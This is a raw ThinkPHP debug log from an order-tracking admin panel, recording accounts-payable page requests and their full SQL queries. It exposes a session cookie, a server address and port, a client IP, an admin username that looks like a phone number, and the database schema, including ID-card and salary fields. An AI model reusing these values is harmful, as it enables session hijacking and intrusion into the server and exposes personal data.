'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'suppliercustomername' => '', 'workername' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001741s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->getTotal[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.009009s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000540s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001554s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000538s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001528s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001136s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001385s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.001788s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.paid_money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.001808s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001707s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"suppliercustomername\":\"\",\"workername\":\"\"}' , '/admin/financial/accountspayable/getTotal' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658309273) [ RunTime:0.006021s ] --------------------------------------------------------------- [ 2022-07-20T17:27:58+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=10&limit=10&filter=%7B%7D&op=%7B%7D&_=1658309272798 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=10&limit=10&filter=%7B%7D&op=%7B%7D&_=1658309272798 [运行时间:0.080236s][吞吐率:12.46req/s] [内存消耗:5,683.43kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000061s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001362s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '10', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1658309272798', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001520s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000129s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000572s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001676s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000550s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001504s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001339s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001725s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000500s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001796s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001132s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001144s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001046s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 10,10 [ RunTime:0.003247s ] --------------------------------------------------------------- [ 2022-07-20T17:28:01+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=20&limit=10&filter=%7B%7D&op=%7B%7D&_=1658309272799 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=20&limit=10&filter=%7B%7D&op=%7B%7D&_=1658309272799 [运行时间:0.080520s][吞吐率:12.42req/s] [内存消耗:5,683.28kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001132s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '20', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1658309272799', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001729s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000119s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000524s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001707s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000549s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001256s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001270s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001863s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000521s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001587s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001080s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001361s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001171s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 20,10 [ RunTime:0.003082s ] --------------------------------------------------------------- [ 2022-07-20T17:28:06+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/getTotal [ info ] 47.105.33.115:8081/admin/financial/accountspayable/getTotal [运行时间:0.062189s][吞吐率:16.08req/s] [内存消耗:5,439.28kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001094s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'getTotal', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '51', 'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'suppliercustomername' => '环球', 'workername' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001537s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->getTotal[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006150s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000383s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001518s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000393s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001503s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001279s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001125s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( suppliercustomer.name = '环球' ) LIMIT 1 [ RunTime:0.001347s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.paid_money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( suppliercustomer.name = '环球' ) LIMIT 1 [ RunTime:0.001253s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001406s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"suppliercustomername\":\"\\u73af\\u7403\",\"workername\":\"\"}' , '/admin/financial/accountspayable/getTotal' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658309286) [ RunTime:0.003379s ] --------------------------------------------------------------- [ 2022-07-20T17:28:06+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%22suppliercustomer.name%22%3A%22%E7%8E%AF%E7%90%83%22%7D&op=%7B%22suppliercustomer.name%22%3A%22%3D%22%7D&_=1658309272800 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%22suppliercustomer.name%22%3A%22%E7%8E%AF%E7%90%83%22%7D&op=%7B%22suppliercustomer.name%22%3A%22%3D%22%7D&_=1658309272800 [运行时间:0.081709s][吞吐率:12.24req/s] [内存消耗:5,688.66kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001212s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => 